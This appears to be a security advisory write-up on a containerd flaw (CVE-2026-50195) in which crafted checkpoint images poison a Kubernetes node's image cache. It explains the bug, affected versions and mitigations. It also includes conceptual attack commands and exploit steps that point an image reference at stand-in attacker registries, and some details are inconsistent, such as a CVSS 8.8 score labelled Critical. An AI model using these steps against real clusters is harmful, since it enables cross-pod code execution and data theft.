Listen to this Post
How CVE-2026-50195 Works
containerd’s CRI (Container Runtime Interface) plugin supports container checkpointing and restoration—a feature that allows saving a running container’s state to disk and later resuming it. The vulnerability resides in the checkpoint import process, where containerd fails to validate image references embedded within a checkpoint image’s configuration.
When a checkpoint is created, it contains metadata that specifies which container image was originally used. Upon restore, containerd reads this metadata and attempts to ensure the referenced image is present locally. However, because no validation is performed on these image references, an attacker with permissions to create pods can craft a malicious checkpoint image. Within this checkpoint’s configuration, the attacker specifies a legitimate-looking local tag (e.g., my-app:latest) but points the actual image reference to a malicious image hosted on a public or attacker-controlled registry.
When the crafted checkpoint is imported, containerd pulls the attacker’s image from the remote registry and assigns it the arbitrary local tag specified in the checkpoint configuration. This poisons the node’s local image cache: the legitimate tag now points to the attacker’s malicious image. Subsequently, any other pod on the same node that attempts to use that tag with an `IfNotPresent` or `Never` pull policy will unknowingly execute the malicious image instead of the intended one. This enables the attacker to execute arbitrary code under the victim pod’s identity, leading to cross-pod compromise on shared Kubernetes nodes.
The vulnerability affects containerd versions 2.1.0 through 2.1.8, 2.2.0 through 2.2.4, and 2.3.0 through 2.3.1. It requires the checkpoint/restore feature to be enabled (CRIU installed) and the attacker to have pod creation permissions. The issue was discovered and disclosed by multiple researchers, including Henry Beberman of Microsoft, the GKE Security Team (using Gemini), Anthropic Research (in collaboration with Claude), and Robert Prast.
DailyCVE Form:
Platform: ……. containerd
Version: …….. v2.1.0–2.1.8, v2.2.0–2.2.4, v2.3.0–2.3.1
Vulnerability :…… CRI checkpoint import image ref validation bypass
Severity: ……. Critical (CVSS 8.8)
date: ………. 2026-06-18
Prediction: ….. Patch expected 2026-06-18 (already released)
What Undercode Say: Analytics
The vulnerability stems from missing input validation in the CRI checkpoint restore code path. Below are analytical commands and code snippets to understand and verify the issue:
Check containerd version:
containerd --version Example output: containerd github.com/containerd/containerd v2.3.1
Verify if CRIU (checkpoint/restore) is enabled:
Check if criu is installed which criu Check containerd config for CRIU support grep -r "enable_criu_support" /etc/containerd/
Inspect a checkpoint image’s configuration (vulnerable metadata):
Extract the checkpoint archive tar -xzf checkpoint.tar.gz View the config.json which contains the image reference cat config.json | jq '.annotations["io.containerd.cri.image-ref"]' An attacker could craft this to point to a malicious image
Simulate the attack vector (conceptual):
1. Attacker creates a checkpoint with poisoned image-ref annotation
echo '{"annotations":{"io.containerd.cri.image-ref":"malicious-registry.com/evil:latest"}}' > config.json
2. Package as checkpoint.tar.gz
tar -czf checkpoint.tar.gz config.json
3. Import via CRI (kubectl or ctr)
ctr checkpoint create --checkpoint-path=./checkpoint.tar.gz
4. containerd pulls malicious image and tags it as the legitimate tag
Check local image cache for poisoning:
crictl images | grep <poisoned-tag> The attacker's image now appears under the legitimate tag
Monitor for unexpected image pulls:
Watch containerd logs for suspicious registry pulls journalctl -u containerd -f | grep -i "pull"
Exploit
An attacker with permissions to create pods on a Kubernetes node can exploit this vulnerability through the following steps:
1. Craft a malicious checkpoint image containing a `config.json` where the `io.containerd.cri.image-ref` annotation points to an attacker-controlled image (e.g., attacker-registry.com/backdoor:latest).
2. Import the checkpoint via the CRI API (e.g., using `kubectl` with a malicious pod spec or ctr checkpoint create). containerd will pull the attacker’s image and tag it locally with the legitimate tag specified in the checkpoint.
3. Wait for victim pods on the same node to use the poisoned tag with `IfNotPresent` or `Never` pull policy. These pods will execute the attacker’s malicious image instead of the intended one.
4. Achieve code execution under the victim pod’s identity, allowing lateral movement, data exfiltration, or further cluster compromise.
The exploit requires no special privileges beyond pod creation and the presence of CRIU on the node. A public proof of concept is available.
Protection
Immediate Actions:
- Upgrade containerd to patched versions: v2.1.9, v2.2.5, or v2.3.2 (or later).
- If running Kubernetes, update your node images or use a node upgrade strategy to ensure all nodes run a patched containerd version.
Workarounds (if patching is not immediately possible):
- Restrict pod creation permissions to trusted users only.
- Only allow trusted images to be pulled.
- Disable checkpoint/restore functionality if not required (remove CRIU or set `enable_criu_support = false` in containerd config).
- Use `Always` pull policy for critical pods to ensure images are re-validated from the registry on each start.
Long-term Recommendations:
- Implement image signing and verification (e.g., using Cosign or Notary) to ensure image integrity.
- Use admission controllers (e.g., OPA/Gatekeeper) to restrict which images can be pulled and which tags are allowed.
- Regularly audit node image caches for unexpected or unauthorized images.
Impact
- Scope: Shared Kubernetes nodes where multiple pods from different tenants or trust boundaries co-exist.
- Confidentiality: Attackers can access sensitive data processed by victim pods.
- Integrity: Attackers can modify application behavior, inject malicious code, or tamper with data.
- Availability: Attackers can cause denial of service by crashing pods or disrupting services.
- Lateral Movement: Compromised pods can be used as a pivot point to attack other services within the cluster or the underlying node.
- Risk Scenario: A single malicious pod creation can poison the image cache for an entire node, affecting all subsequent pods that rely on the poisoned tag. This is particularly dangerous in multi-tenant environments or CI/CD pipelines where shared nodes are common.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
